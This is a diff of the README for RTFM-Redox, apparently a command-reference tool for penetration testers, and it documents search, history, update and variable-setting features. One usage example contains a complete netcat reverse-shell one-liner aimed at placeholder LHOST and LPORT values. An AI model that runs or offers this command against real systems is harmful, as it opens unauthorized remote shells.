gregscharf/RTFM-Redox/README.md

 - Ctrl+r to dynamically search the RTFM database for commands as you type and display those in a selectable list.
 Works similarly to using Ctrl+r to search through terminal history.
 - Ctrl+h to display a history of previously selected commands from the current session in a selectable list.
 - up/down arrow keys to highlight a command from the current search or from the history.
 Pressing return copies that command to the clipboard.
-- 'info' displays full information on the currently selected command.  'full information' is very sparse at the moment.
+- 'info' displays full information on the currently selected command along with any variables that can be set and that are already set.
 - 'add -c [command]' to add a new command to the database.  optional: -d to add a comment/description with the command.
 - 'update [column] [content]' to update a database column in the currently selected command.
 At the moment the only columns to update are 'command', 'comment' and 'author'.
 Examples: 'update comment spawn a pty via python3', 'update author greg scharf', 'update command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [LHOST] [LPORT] >/tmp/f'.
+- 'set' to set variables that will be replaced in commands that have placeholders such as [LHOST], [RHOST], etc. Example: 'set LHOST 10.200.13.3'

 ## Currently Working On
 - 'set' command for variable replacement when selecting a command that has placeholders for LHOST, LPORT, etc.